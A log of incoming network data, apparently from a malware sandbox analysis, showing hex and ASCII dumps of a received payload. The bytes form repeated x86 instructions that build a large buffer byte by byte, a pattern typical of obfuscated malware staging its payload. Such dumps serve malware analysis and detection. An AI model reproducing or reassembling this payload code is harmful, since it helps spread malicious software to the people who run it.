2022-05-16 08:29:53 UTC	637	IN	Data Raw: f4 ff 71 c6 85 8d 5c f4 ff 52 c6 85 8e 5c f4 ff fb c6 85 8f 5c f4 ff 17 c6 85 90 5c f4 ff f6 c6 85 91 5c f4 ff 1e c6 85 92 5c f4 ff 96 c6 85 93 5c f4 ff f8 c6 85 94 5c f4 ff 34 c6 85 95 5c f4 ff 52 c6 85 96 5c f4 ff 37 c6 85 97 5c f4 ff c8 c6 85 98 5c f4 ff 11 c6 85 99 5c f4 ff 6d c6 85 9a 5c f4 ff 95 c6 85 9b 5c f4 ff 69 c6 85 9c 5c f4 ff 74 c6 85 9d 5c f4 ff 2d c6 85 9e 5c f4 ff 38 c6 85 9f 5c f4 ff 69 c6 85 a0 5c f4 ff fc c6 85 a1 5c f4 ff 9a c6 85 a2 5c f4 ff 2d c6 85 a3 5c f4 ff 8f c6 85 a4 5c f4 ff 74 c6 85 a5 5c f4 ff fc c6 85 a6 5c f4 ff 69 c6 85 a7 5c f4 ff 38 c6 85 a8 5c f4 ff ed c6 85 a9 5c f4 ff 33 c6 85 aa 5c f4 ff eb c6 85 ab 5c f4 ff c0 c6 85 ac 5c f4 ff ba c6 85 ad 5c f4 ff 76 c6 85 ae 5c f4 ff 00 c6 85 af 5c f4 ff bd c6 85 b0 5c f4 ff ac Data Ascii: q\R\\\\\\\4\R\7\\\m\\i\t\-\8\i\\\-\\t\\i\8\\3\\\\v\\\
2022-05-16 08:29:53 UTC	653	IN	Data Raw: 85 b1 65 f4 ff d8 c6 85 b2 65 f4 ff f5 c6 85 b3 65 f4 ff 98 c6 85 b4 65 f4 ff e1 c6 85 b5 65 f4 ff 00 c6 85 b6 65 f4 ff 79 c6 85 b7 65 f4 ff df c6 85 b8 65 f4 ff 14 c6 85 b9 65 f4 ff 7a c6 85 ba 65 f4 ff cf c6 85 bb 65 f4 ff 9c c6 85 bc 65 f4 ff 69 c6 85 bd 65 f4 ff 07 c6 85 be 65 f4 ff 08 c6 85 bf 65 f4 ff 24 c6 85 c0 65 f4 ff b9 c6 85 c1 65 f4 ff c6 c6 85 c2 65 f4 ff 26 c6 85 c3 65 f4 ff 44 c6 85 c4 65 f4 ff 2a c6 85 c5 65 f4 ff 28 c6 85 c6 65 f4 ff f5 c6 85 c7 65 f4 ff 01 c6 85 c8 65 f4 ff 1c c6 85 c9 65 f4 ff ee c6 85 ca 65 f4 ff 79 c6 85 cb 65 f4 ff 57 c6 85 cc 65 f4 ff e1 c6 85 cd 65 f4 ff ca c6 85 ce 65 f4 ff fd c6 85 cf 65 f4 ff cc c6 85 d0 65 f4 ff 2e c6 85 d1 65 f4 ff b1 c6 85 d2 65 f4 ff 44 c6 85 d3 65 f4 ff 31 c6 85 d4 65 f4 ff 42 c6 85 d5 65 Data Ascii: eeeeeeyeeezeeeieee$eee&eDe*e(eeeeeyeWeeeee.eeDe1eBe
2022-05-16 08:29:53 UTC	669	IN	Data Raw: ff 38 c6 85 d6 6e f4 ff 08 c6 85 d7 6e f4 ff e8 c6 85 d8 6e f4 ff f6 c6 85 d9 6e f4 ff b8 c6 85 da 6e f4 ff b8 c6 85 db 6e f4 ff bb c6 85 dc 6e f4 ff 4a c6 85 dd 6e f4 ff 04 c6 85 de 6e f4 ff 62 c6 85 df 6e f4 ff c1 c6 85 e0 6e f4 ff f0 c6 85 e1 6e f4 ff 7a c6 85 e2 6e f4 ff 16 c6 85 e3 6e f4 ff 7f c6 85 e4 6e f4 ff a5 c6 85 e5 6e f4 ff e1 c6 85 e6 6e f4 ff 66 c6 85 e7 6e f4 ff b1 c6 85 e8 6e f4 ff cf c6 85 e9 6e f4 ff 17 c6 85 ea 6e f4 ff a0 c6 85 eb 6e f4 ff 37 c6 85 ec 6e f4 ff bb c6 85 ed 6e f4 ff b3 c6 85 ee 6e f4 ff ba c6 85 ef 6e f4 ff b5 c6 85 f0 6e f4 ff 33 c6 85 f1 6e f4 ff 15 c6 85 f2 6e f4 ff 79 c6 85 f3 6e f4 ff f0 c6 85 f4 6e f4 ff 94 c6 85 f5 6e f4 ff 04 c6 85 f6 6e f4 ff 09 c6 85 f7 6e f4 ff 6e c6 85 f8 6e f4 ff ce c6 85 f9 6e f4 ff cf c6 Data Ascii: 8nnnnnnnJnnbnnnznnnnnfnnnnn7nnnnn3nnynnnnnnnn
2022-05-16 08:29:53 UTC	685	IN	Data Raw: fa 77 f4 ff eb c6 85 fb 77 f4 ff c0 c6 85 fc 77 f4 ff ba c6 85 fd 77 f4 ff 0a c6 85 fe 77 f4 ff 00 c6 85 ff 77 f4 ff b9 c6 85 00 78 f4 ff ac c6 85 01 78 f4 ff 99 c6 85 02 78 f4 ff 7f c6 85 03 78 f4 ff f5 c6 85 04 78 f4 ff 48 c6 85 05 78 f4 ff b3 c6 85 06 78 f4 ff c6 c6 85 07 78 f4 ff e4 c6 85 08 78 f4 ff 09 c6 85 09 78 f4 ff fb c6 85 0a 78 f4 ff 10 c6 85 0b 78 f4 ff 92 c6 85 0c 78 f4 ff f4 c6 85 0d 78 f4 ff 9d c6 85 0e 78 f4 ff 13 c6 85 0f 78 f4 ff 21 c6 85 10 78 f4 ff ec c6 85 11 78 f4 ff c7 c6 85 12 78 f4 ff 73 c6 85 13 78 f4 ff 85 c6 85 14 78 f4 ff 01 c6 85 15 78 f4 ff 3c c6 85 16 78 f4 ff ec c6 85 17 78 f4 ff 30 c6 85 18 78 f4 ff 56 c6 85 19 78 f4 ff cd c6 85 1a 78 f4 ff d0 c6 85 1b 78 f4 ff e9 c6 85 1c 78 f4 ff b0 c6 85 1d 78 f4 ff a5 c6 85 1e 78 f4 Data Ascii: wwwwwwxxxxxHxxxxxxxxxxx!xxxsxxx<xx0xVxxxxxx
2022-05-16 08:29:53 UTC	701	IN	Data Raw: e8 c6 85 1f 81 f4 ff 1d c6 85 20 81 f4 ff e1 c6 85 21 81 f4 ff f4 c6 85 22 81 f4 ff 50 c6 85 23 81 f4 ff 70 c6 85 24 81 f4 ff fc c6 85 25 81 f4 ff 42 c6 85 26 81 f4 ff 56 c6 85 27 81 f4 ff d5 c6 85 28 81 f4 ff 92 c6 85 29 81 f4 ff 3c c6 85 2a 81 f4 ff 6a c6 85 2b 81 f4 ff 24 c6 85 2c 81 f4 ff 08 c6 85 2d 81 f4 ff 3b c6 85 2e 81 f4 ff 79 c6 85 2f 81 f4 ff 34 c6 85 30 81 f4 ff ef c6 85 31 81 f4 ff 97 c6 85 32 81 f4 ff 7b c6 85 33 81 f4 ff 00 c6 85 34 81 f4 ff f4 c6 85 35 81 f4 ff 19 c6 85 36 81 f4 ff fc c6 85 37 81 f4 ff 7a c6 85 38 81 f4 ff 29 c6 85 39 81 f4 ff 18 c6 85 3a 81 f4 ff 69 c6 85 3b 81 f4 ff 07 c6 85 3c 81 f4 ff 08 c6 85 3d 81 f4 ff 24 c6 85 3e 81 f4 ff a1 c6 85 3f 81 f4 ff c6 c6 85 40 81 f4 ff 3d c6 85 41 81 f4 ff 44 c6 85 42 81 f4 ff 13 c6 85 Data Ascii: !"P#p$%B&V'()<*j+$,-;.y/4012{34567z8)9:i;<=$>?@=ADB
2022-05-16 08:29:53 UTC	717	IN	Data Raw: 8a f4 ff eb c6 85 44 8a f4 ff 30 c6 85 45 8a f4 ff 56 c6 85 46 8a f4 ff 6a c6 85 47 8a f4 ff 06 c6 85 48 8a f4 ff b0 c6 85 49 8a f4 ff db c6 85 4a 8a f4 ff c3 c6 85 4b 8a f4 ff 7f c6 85 4c 8a f4 ff ed c6 85 4d 8a f4 ff 48 c6 85 4e 8a f4 ff 84 c6 85 4f 8a f4 ff 39 c6 85 50 8a f4 ff 66 c6 85 51 8a f4 ff 56 c6 85 52 8a f4 ff 23 c6 85 53 8a f4 ff 27 c6 85 54 8a f4 ff 89 c6 85 55 8a f4 ff de c6 85 56 8a f4 ff ec c6 85 57 8a f4 ff b8 c6 85 58 8a f4 ff b8 c6 85 59 8a f4 ff 58 c6 85 5a 8a f4 ff 6f c6 85 5b 8a f4 ff fc c6 85 5c 8a f4 ff a5 c6 85 5d 8a f4 ff 00 c6 85 5e 8a f4 ff 9c c6 85 5f 8a f4 ff 9a c6 85 60 8a f4 ff da c6 85 61 8a f4 ff d6 c6 85 62 8a f4 ff a5 c6 85 63 8a f4 ff 09 c6 85 64 8a f4 ff ee c6 85 65 8a f4 ff f5 c6 85 66 8a f4 ff 06 c6 85 67 8a f4 ff Data Ascii: D0EVFjGHIJKLMHNO9PfQVR#S'TUVWXYXZo[\]^_`abcdefg
2022-05-16 08:29:53 UTC	733	IN	Data Raw: c6 85 68 93 f4 ff 56 c6 85 69 93 f4 ff a5 c6 85 6a 93 f4 ff 33 c6 85 6b 93 f4 ff 6c c6 85 6c 93 f4 ff ac c6 85 6d 93 f4 ff 58 c6 85 6e 93 f4 ff cf c6 85 6f 93 f4 ff a9 c6 85 70 93 f4 ff 62 c6 85 71 93 f4 ff 82 c6 85 72 93 f4 ff 88 c6 85 73 93 f4 ff d8 c6 85 74 93 f4 ff 95 c6 85 75 93 f4 ff 29 c6 85 76 93 f4 ff b8 c6 85 77 93 f4 ff b8 c6 85 78 93 f4 ff 57 c6 85 79 93 f4 ff c8 c6 85 7a 93 f4 ff 1b c6 85 7b 93 f4 ff 5e c6 85 7c 93 f4 ff be c6 85 7d 93 f4 ff 27 c6 85 7e 93 f4 ff 08 c6 85 7f 93 f4 ff 69 c6 85 80 93 f4 ff f4 c6 85 81 93 f4 ff b7 c6 85 82 93 f4 ff 0e c6 85 83 93 f4 ff e0 c6 85 84 93 f4 ff 82 c6 85 85 93 f4 ff 26 c6 85 86 93 f4 ff 94 c6 85 87 93 f4 ff 1d c6 85 88 93 f4 ff 32 c6 85 89 93 f4 ff 17 c6 85 8a 93 f4 ff b5 c6 85 8b 93 f4 ff 6f c6 85 8c Data Ascii: hVij3kllmXnopbqrstu)vwxWyz{^\|}'~i&2o
2022-05-16 08:29:53 UTC	749	IN	Data Raw: f4 ff c1 c6 85 8d 9c f4 ff 17 c6 85 8e 9c f4 ff 3e c6 85 8f 9c f4 ff be c6 85 90 9c f4 ff 0b c6 85 91 9c f4 ff cf c6 85 92 9c f4 ff 57 c6 85 93 9c f4 ff 4c c6 85 94 9c f4 ff 03 c6 85 95 9c f4 ff 15 c6 85 96 9c f4 ff 0b c6 85 97 9c f4 ff 5a c6 85 98 9c f4 ff 5a c6 85 99 9c f4 ff 56 c6 85 9a 9c f4 ff 6c c6 85 9b 9c f4 ff ce c6 85 9c 9c f4 ff cc c6 85 9d 9c f4 ff cb c6 85 9e 9c f4 ff 5a c6 85 9f 9c f4 ff 0b c6 85 a0 9c f4 ff 50 c6 85 a1 9c f4 ff 8b c6 85 a2 9c f4 ff 25 c6 85 a3 9c f4 ff 43 c6 85 a4 9c f4 ff 56 c6 85 a5 9c f4 ff df c6 85 a6 9c f4 ff d3 c6 85 a7 9c f4 ff d0 c6 85 a8 9c f4 ff 1d c6 85 a9 9c f4 ff 96 c6 85 aa 9c f4 ff 0b c6 85 ab 9c f4 ff d0 c6 85 ac 9c f4 ff 24 c6 85 ad 9c f4 ff 1b c6 85 ae 9c f4 ff 43 c6 85 af 9c f4 ff f4 c6 85 b0 9c f4 ff 6c Data Ascii: >WLZZVlZP%CV$Cl
2022-05-16 08:29:53 UTC	765	IN	Data Raw: 85 b1 a5 f4 ff 53 c6 85 b2 a5 f4 ff 95 c6 85 b3 a5 f4 ff 09 c6 85 b4 a5 f4 ff 99 c6 85 b5 a5 f4 ff cd c6 85 b6 a5 f4 ff 07 c6 85 b7 a5 f4 ff 92 c6 85 b8 a5 f4 ff 39 c6 85 b9 a5 f4 ff c8 c6 85 ba a5 f4 ff b9 c6 85 bb a5 f4 ff 38 c6 85 bc a5 f4 ff be c6 85 bd a5 f4 ff 32 c6 85 be a5 f4 ff 6f c6 85 bf a5 f4 ff e1 c6 85 c0 a5 f4 ff f4 c6 85 c1 a5 f4 ff aa c6 85 c2 a5 f4 ff 86 c6 85 c3 a5 f4 ff 86 c6 85 c4 a5 f4 ff 64 c6 85 c5 a5 f4 ff 91 c6 85 c6 a5 f4 ff cd c6 85 c7 a5 f4 ff 2d c6 85 c8 a5 f4 ff 63 c6 85 c9 a5 f4 ff 71 c6 85 ca a5 f4 ff f9 c6 85 cb a5 f4 ff 45 c6 85 cc a5 f4 ff f8 c6 85 cd a5 f4 ff bc c6 85 ce a5 f4 ff 56 c6 85 cf a5 f4 ff db c6 85 d0 a5 f4 ff db c6 85 d1 a5 f4 ff 74 c6 85 d2 a5 f4 ff 1c c6 85 d3 a5 f4 ff 96 c6 85 d4 a5 f4 ff 0b c6 85 d5 a5 Data Ascii: S982od-cqEVt
2022-05-16 08:29:53 UTC	781	IN	Data Raw: ff 00 c6 85 d6 ae f4 ff 1e c6 85 d7 ae f4 ff ff c6 85 d8 ae f4 ff 9e c6 85 d9 ae f4 ff 92 c6 85 da ae f4 ff 79 c6 85 db ae f4 ff 1f c6 85 dc ae f4 ff d1 c6 85 dd ae f4 ff 1a c6 85 de ae f4 ff 96 c6 85 df ae f4 ff f8 c6 85 e0 ae f4 ff ef c6 85 e1 ae f4 ff 61 c6 85 e2 ae f4 ff 66 c6 85 e3 ae f4 ff 43 c6 85 e4 ae f4 ff f4 c6 85 e5 ae f4 ff b9 c6 85 e6 ae f4 ff d3 c6 85 e7 ae f4 ff 45 c6 85 e8 ae f4 ff 44 c6 85 e9 ae f4 ff 1e c6 85 ea ae f4 ff 0b c6 85 eb ae f4 ff cd c6 85 ec ae f4 ff ac c6 85 ed ae f4 ff 7d c6 85 ee ae f4 ff a5 c6 85 ef ae f4 ff 43 c6 85 f0 ae f4 ff 35 c6 85 f1 ae f4 ff 7d c6 85 f2 ae f4 ff 41 c6 85 f3 ae f4 ff 1c c6 85 f4 ae f4 ff e8 c6 85 f5 ae f4 ff ab c6 85 f6 ae f4 ff 07 c6 85 f7 ae f4 ff 43 c6 85 f8 ae f4 ff db c6 85 f9 ae f4 ff 13 c6 Data Ascii: yafCED}C5}AC
2022-05-16 08:29:53 UTC	797	IN	Data Raw: fa b7 f4 ff 08 c6 85 fb b7 f4 ff 33 c6 85 fc b7 f4 ff ed c6 85 fd b7 f4 ff c8 c6 85 fe b7 f4 ff 55 c6 85 ff b7 f4 ff 7f c6 85 00 b8 f4 ff a4 c6 85 01 b8 f4 ff fc c6 85 02 b8 f4 ff a4 c6 85 03 b8 f4 ff 19 c6 85 04 b8 f4 ff b9 c6 85 05 b8 f4 ff 9a c6 85 06 b8 f4 ff f4 c6 85 07 b8 f4 ff 09 c6 85 08 b8 f4 ff 45 c6 85 09 b8 f4 ff b6 c6 85 0a b8 f4 ff 07 c6 85 0b b8 f4 ff 92 c6 85 0c b8 f4 ff ea c6 85 0d b8 f4 ff 87 c6 85 0e b8 f4 ff e0 c6 85 0f b8 f4 ff bb c6 85 10 b8 f4 ff b3 c6 85 11 b8 f4 ff f8 c6 85 12 b8 f4 ff 7b c6 85 13 b8 f4 ff 2d c6 85 14 b8 f4 ff 38 c6 85 15 b8 f4 ff 69 c6 85 16 b8 f4 ff fc c6 85 17 b8 f4 ff 9a c6 85 18 b8 f4 ff b4 c6 85 19 b8 f4 ff c8 c6 85 1a b8 f4 ff 54 c6 85 1b b8 f4 ff 61 c6 85 1c b8 f4 ff 2e c6 85 1d b8 f4 ff b1 c6 85 1e b8 f4 Data Ascii: 3UE{-8iTa.
2022-05-16 08:29:53 UTC	813	IN	Data Raw: de c6 85 1f c1 f4 ff 1b c6 85 20 c1 f4 ff a9 c6 85 21 c1 f4 ff bb c6 85 22 c1 f4 ff b4 c6 85 23 c1 f4 ff 9d c6 85 24 c1 f4 ff a6 c6 85 25 c1 f4 ff b7 c6 85 26 c1 f4 ff 0e c6 85 27 c1 f4 ff 75 c6 85 28 c1 f4 ff f8 c6 85 29 c1 f4 ff a4 c6 85 2a c1 f4 ff 6a c6 85 2b c1 f4 ff 4d c6 85 2c c1 f4 ff 04 c6 85 2d c1 f4 ff 7a c6 85 2e c1 f4 ff 02 c6 85 2f c1 f4 ff 7f c6 85 30 c1 f4 ff 5b c6 85 31 c1 f4 ff 1e c6 85 32 c1 f4 ff e2 c6 85 33 c1 f4 ff 4a c6 85 34 c1 f4 ff ff c6 85 35 c1 f4 ff 1b c6 85 36 c1 f4 ff 24 c6 85 37 c1 f4 ff af c6 85 38 c1 f4 ff 9c c6 85 39 c1 f4 ff 02 c6 85 3a c1 f4 ff 5e c6 85 3b c1 f4 ff e1 c6 85 3c c1 f4 ff b8 c6 85 3d c1 f4 ff 6a c6 85 3e c1 f4 ff b9 c6 85 3f c1 f4 ff 49 c6 85 40 c1 f4 ff d8 c6 85 41 c1 f4 ff 65 c6 85 42 c1 f4 ff d3 c6 85 Data Ascii: !"#$%&'u()*j+M,-z./0[123J456$789:^;<=j>?I@AeB
2022-05-16 08:29:53 UTC	829	IN	Data Raw: ca f4 ff 00 c6 85 44 ca f4 ff 35 c6 85 45 ca f4 ff ed c6 85 46 ca f4 ff 0b c6 85 47 ca f4 ff 11 c6 85 48 ca f4 ff dd c6 85 49 ca f4 ff 1b c6 85 4a ca f4 ff a2 c6 85 4b ca f4 ff d8 c6 85 4c ca f4 ff 19 c6 85 4d ca f4 ff 94 c6 85 4e ca f4 ff 0b c6 85 4f ca f4 ff 47 c6 85 50 ca f4 ff 33 c6 85 51 ca f4 ff 75 c6 85 52 ca f4 ff ff c6 85 53 ca f4 ff 7e c6 85 54 ca f4 ff ac c6 85 55 ca f4 ff 34 c6 85 56 ca f4 ff 7c c6 85 57 ca f4 ff da c6 85 58 ca f4 ff 94 c6 85 59 ca f4 ff 19 c6 85 5a ca f4 ff f0 c6 85 5b ca f4 ff 19 c6 85 5c ca f4 ff ea c6 85 5d ca f4 ff c5 c6 85 5e ca f4 ff 6f c6 85 5f ca f4 ff 1b c6 85 60 ca f4 ff 3c c6 85 61 ca f4 ff b3 c6 85 62 ca f4 ff 9e c6 85 63 ca f4 ff 39 c6 85 64 ca f4 ff dd c6 85 65 ca f4 ff e8 c6 85 66 ca f4 ff 48 c6 85 67 ca f4 ff Data Ascii: D5EFGHIJKLMNOGP3QuRS~TU4V\|WXYZ[\]^o_`<abc9defHg
2022-05-16 08:29:53 UTC	845	IN	Data Raw: c6 85 68 d3 f4 ff b4 c6 85 69 d3 f4 ff c8 c6 85 6a d3 f4 ff 54 c6 85 6b d3 f4 ff 61 c6 85 6c d3 f4 ff 2c c6 85 6d d3 f4 ff b9 c6 85 6e d3 f4 ff 44 c6 85 6f d3 f4 ff 33 c6 85 70 d3 f4 ff 42 c6 85 71 d3 f4 ff 4b c6 85 72 d3 f4 ff 06 c6 85 73 d3 f4 ff be c6 85 74 d3 f4 ff d6 c6 85 75 d3 f4 ff 55 c6 85 76 d3 f4 ff 1e c6 85 77 d3 f4 ff 96 c6 85 78 d3 f4 ff 77 c6 85 79 d3 f4 ff 7c c6 85 7a d3 f4 ff bc c6 85 7b d3 f4 ff bb c6 85 7c d3 f4 ff 4a c6 85 7d d3 f4 ff 08 c6 85 7e d3 f4 ff 68 c6 85 7f d3 f4 ff 01 c6 85 80 d3 f4 ff 7f c6 85 81 d3 f4 ff d7 c6 85 82 d3 f4 ff 08 c6 85 83 d3 f4 ff 19 c6 85 84 d3 f4 ff 40 c6 85 85 d3 f4 ff bc c6 85 86 d3 f4 ff ab c6 85 87 d3 f4 ff 03 c6 85 88 d3 f4 ff 07 c6 85 89 d3 f4 ff 5e c6 85 8a d3 f4 ff a5 c6 85 8b d3 f4 ff 8f c6 85 8c Data Ascii: hijTkal,mnDo3pBqKrstuUvwxwy\|z{\|J}~h@^
2022-05-16 08:29:53 UTC	861	IN	Data Raw: f4 ff 44 c6 85 8d dc f4 ff 09 c6 85 8e dc f4 ff f2 c6 85 8f dc f4 ff a5 c6 85 90 dc f4 ff 30 c6 85 91 dc f4 ff 56 c6 85 92 dc f4 ff 6a c6 85 93 dc f4 ff a6 c6 85 94 dc f4 ff e5 c6 85 95 dc f4 ff f3 c6 85 96 dc f4 ff 69 c6 85 97 dc f4 ff 38 c6 85 98 dc f4 ff ed c6 85 99 dc f4 ff 33 c6 85 9a dc f4 ff eb c6 85 9b dc f4 ff 12 c6 85 9c dc f4 ff df c6 85 9d dc f4 ff 1b c6 85 9e dc f4 ff aa c6 85 9f dc f4 ff bb c6 85 a0 dc f4 ff a4 c6 85 a1 dc f4 ff 95 c6 85 a2 dc f4 ff 33 c6 85 a3 dc f4 ff b8 c6 85 a4 dc f4 ff 50 c6 85 a5 dc f4 ff 37 c6 85 a6 dc f4 ff 43 c6 85 a7 dc f4 ff f4 c6 85 a8 dc f4 ff 6a c6 85 a9 dc f4 ff 4d c6 85 aa dc f4 ff 08 c6 85 ab dc f4 ff 11 c6 85 ac dc f4 ff 35 c6 85 ad dc f4 ff 96 c6 85 ae dc f4 ff f4 c6 85 af dc f4 ff 09 c6 85 b0 dc f4 ff 18 Data Ascii: D0Vji833P7CjM5
2022-05-16 08:29:53 UTC	877	IN	Data Raw: 85 b1 e5 f4 ff c8 c6 85 b2 e5 f4 ff b1 c6 85 b3 e5 f4 ff c8 c6 85 b4 e5 f4 ff df c6 85 b5 e5 f4 ff a7 c6 85 b6 e5 f4 ff 53 c6 85 b7 e5 f4 ff f7 c6 85 b8 e5 f4 ff 7f c6 85 b9 e5 f4 ff e8 c6 85 ba e5 f4 ff cc c6 85 bb e5 f4 ff dd c6 85 bc e5 f4 ff f0 c6 85 bd e5 f4 ff c8 c6 85 be e5 f4 ff fa c6 85 bf e5 f4 ff 38 c6 85 c0 e5 f4 ff f5 c6 85 c1 e5 f4 ff 1c c6 85 c2 e5 f4 ff 5a c6 85 c3 e5 f4 ff 9b c6 85 c4 e5 f4 ff 07 c6 85 c5 e5 f4 ff 43 c6 85 c6 e5 f4 ff d5 c6 85 c7 e5 f4 ff 92 c6 85 c8 e5 f4 ff 52 c6 85 c9 e5 f4 ff bb c6 85 ca e5 f4 ff ac c6 85 cb e5 f4 ff 95 c6 85 cc e5 f4 ff 7d c6 85 cd e5 f4 ff b9 c6 85 ce e5 f4 ff 33 c6 85 cf e5 f4 ff 75 c6 85 d0 e5 f4 ff fb c6 85 d1 e5 f4 ff 7f c6 85 d2 e5 f4 ff 04 c6 85 d3 e5 f4 ff 5d c6 85 d4 e5 f4 ff 37 c6 85 d5 e5 Data Ascii: S8ZCR}3u]7
2022-05-16 08:29:53 UTC	893	IN	Data Raw: ff 63 c6 85 d6 ee f4 ff e2 c6 85 d7 ee f4 ff 52 c6 85 d8 ee f4 ff fb c6 85 d9 ee f4 ff 1b c6 85 da ee f4 ff 63 c6 85 db ee f4 ff c8 c6 85 dc ee f4 ff b1 c6 85 dd ee f4 ff cc c6 85 de ee f4 ff dd c6 85 df ee f4 ff 40 c6 85 e0 ee f4 ff e5 c6 85 e1 ee f4 ff 23 c6 85 e2 ee f4 ff f0 c6 85 e3 ee f4 ff a5 c6 85 e4 ee f4 ff fc c6 85 e5 ee f4 ff 9a c6 85 e6 ee f4 ff 2d c6 85 e7 ee f4 ff 8f c6 85 e8 ee f4 ff ed c6 85 e9 ee f4 ff bb c6 85 ea ee f4 ff 49 c6 85 eb ee f4 ff a5 c6 85 ec ee f4 ff 31 c6 85 ed ee f4 ff f5 c6 85 ee ee f4 ff fb c6 85 ef ee f4 ff c8 c6 85 f0 ee f4 ff 13 c6 85 f1 ee f4 ff 5e c6 85 f2 ee f4 ff 06 c6 85 f3 ee f4 ff bb c6 85 f4 ee f4 ff ac c6 85 f5 ee f4 ff 95 c6 85 f6 ee f4 ff 1c c6 85 f7 ee f4 ff c5 c6 85 f8 ee f4 ff bc c6 85 f9 ee f4 ff 30 c6 Data Ascii: cRc@#-I1^0
2022-05-16 08:29:53 UTC	909	IN	Data Raw: fa f7 f4 ff b1 c6 85 fb f7 f4 ff 9a c6 85 fc f7 f4 ff 87 c6 85 fd f7 f4 ff 97 c6 85 fe f7 f4 ff 2e c6 85 ff f7 f4 ff a4 c6 85 00 f8 f4 ff 61 c6 85 01 f8 f4 ff ec c6 85 02 f8 f4 ff 04 c6 85 03 f8 f4 ff 19 c6 85 04 f8 f4 ff 2c c6 85 05 f8 f4 ff b3 c6 85 06 f8 f4 ff 7f c6 85 07 f8 f4 ff d5 c6 85 08 f8 f4 ff 0b c6 85 09 f8 f4 ff 67 c6 85 0a f8 f4 ff bc c6 85 0b f8 f4 ff e1 c6 85 0c f8 f4 ff 38 c6 85 0d f8 f4 ff 69 c6 85 0e f8 f4 ff fc c6 85 0f f8 f4 ff 9a c6 85 10 f8 f4 ff 2d c6 85 11 f8 f4 ff 8f c6 85 12 f8 f4 ff 74 c6 85 13 f8 f4 ff fc c6 85 14 f8 f4 ff 69 c6 85 15 f8 f4 ff 38 c6 85 16 f8 f4 ff 74 c6 85 17 f8 f4 ff 74 c6 85 18 f8 f4 ff 52 c6 85 19 f8 f4 ff c8 c6 85 1a f8 f4 ff ba c6 85 1b f8 f4 ff d5 c6 85 1c f8 f4 ff ba c6 85 1d f8 f4 ff 28 c6 85 1e f8 f4 Data Ascii: .a,g8i-ti8ttR(
2022-05-16 08:29:53 UTC	925	IN	Data Raw: b4 c6 85 1f 01 f5 ff b3 c6 85 20 01 f5 ff fe c6 85 21 01 f5 ff f5 c6 85 22 01 f5 ff 94 c6 85 23 01 f5 ff 25 c6 85 24 01 f5 ff 7f c6 85 25 01 f5 ff c7 c6 85 26 01 f5 ff 08 c6 85 27 01 f5 ff 19 c6 85 28 01 f5 ff a7 c6 85 29 01 f5 ff 27 c6 85 2a 01 f5 ff 29 c6 85 2b 01 f5 ff 0b c6 85 2c 01 f5 ff 06 c6 85 2d 01 f5 ff 19 c6 85 2e 01 f5 ff 24 c6 85 2f 01 f5 ff bf c6 85 30 01 f5 ff 32 c6 85 31 01 f5 ff 71 c6 85 32 01 f5 ff 5a c6 85 33 01 f5 ff a5 c6 85 34 01 f5 ff 33 c6 85 35 01 f5 ff b4 c6 85 36 01 f5 ff 08 c6 85 37 01 f5 ff f7 c6 85 38 01 f5 ff bb c6 85 39 01 f5 ff 1b c6 85 3a 01 f5 ff 0d c6 85 3b 01 f5 ff ab c6 85 3c 01 f5 ff a0 c6 85 3d 01 f5 ff 3b c6 85 3e 01 f5 ff a5 c6 85 3f 01 f5 ff f4 c6 85 40 01 f5 ff 33 c6 85 41 01 f5 ff fd c6 85 42 01 f5 ff ff c6 85 Data Ascii: !"#%$%&'()'*)+,-.$/021q2Z34356789:;<=;>?@3AB
2022-05-16 08:29:53 UTC	941	IN	Data Raw: 0a f5 ff 7c c6 85 44 0a f5 ff e1 c6 85 45 0a f5 ff 5a c6 85 46 0a f5 ff 31 c6 85 47 0a f5 ff e8 c6 85 48 0a f5 ff 35 c6 85 49 0a f5 ff 75 c6 85 4a 0a f5 ff f3 c6 85 4b 0a f5 ff 90 c6 85 4c 0a f5 ff 42 c6 85 4d 0a f5 ff 00 c6 85 4e 0a f5 ff f4 c6 85 4f 0a f5 ff 92 c6 85 50 0a f5 ff f4 c6 85 51 0a f5 ff 1b c6 85 52 0a f5 ff c0 c6 85 53 0a f5 ff 11 c6 85 54 0a f5 ff e0 c6 85 55 0a f5 ff 4a c6 85 56 0a f5 ff e3 c6 85 57 0a f5 ff 19 c6 85 58 0a f5 ff 24 c6 85 59 0a f5 ff a7 c6 85 5a 0a f5 ff 1c c6 85 5b 0a f5 ff 69 c6 85 5c 0a f5 ff ae c6 85 5d 0a f5 ff 5a c6 85 5e 0a f5 ff 47 c6 85 5f 0a f5 ff 68 c6 85 60 0a f5 ff b1 c6 85 61 0a f5 ff 49 c6 85 62 0a f5 ff bb c6 85 63 0a f5 ff 13 c6 85 64 0a f5 ff 05 c6 85 65 0a f5 ff ca c6 85 66 0a f5 ff fd c6 85 67 0a f5 ff Data Ascii: \|DEZF1GH5IuJKLBMNOPQRSTUJVWX$YZ[i\]Z^G_h`aIbcdefg
2022-05-16 08:29:53 UTC	957	IN	Data Raw: c6 85 68 13 f5 ff f9 c6 85 69 13 f5 ff bc c6 85 6a 13 f5 ff d5 c6 85 6b 13 f5 ff 92 c6 85 6c 13 f5 ff 52 c6 85 6d 13 f5 ff bb c6 85 6e 13 f5 ff 04 c6 85 6f 13 f5 ff 34 c6 85 70 13 f5 ff 37 c6 85 71 13 f5 ff 74 c6 85 72 13 f5 ff 74 c6 85 73 13 f5 ff fc c6 85 74 13 f5 ff cb c6 85 75 13 f5 ff 38 c6 85 76 13 f5 ff 2d c6 85 77 13 f5 ff cc c6 85 78 13 f5 ff a1 c6 85 79 13 f5 ff 19 c6 85 7a 13 f5 ff 18 c6 85 7b 13 f5 ff 11 c6 85 7c 13 f5 ff 49 c6 85 7d 13 f5 ff ed c6 85 7e 13 f5 ff e0 c6 85 7f 13 f5 ff 4a c6 85 80 13 f5 ff fb c6 85 81 13 f5 ff 19 c6 85 82 13 f5 ff 24 c6 85 83 13 f5 ff bf c6 85 84 13 f5 ff 1c c6 85 85 13 f5 ff 7f c6 85 86 13 f5 ff b9 c6 85 87 13 f5 ff 5a c6 85 88 13 f5 ff 47 c6 85 89 13 f5 ff 68 c6 85 8a 13 f5 ff b1 c6 85 8b 13 f5 ff 5d c6 85 8c Data Ascii: hijklRmno4p7qtrtstu8v-wxyz{\|I}~J$ZGh]
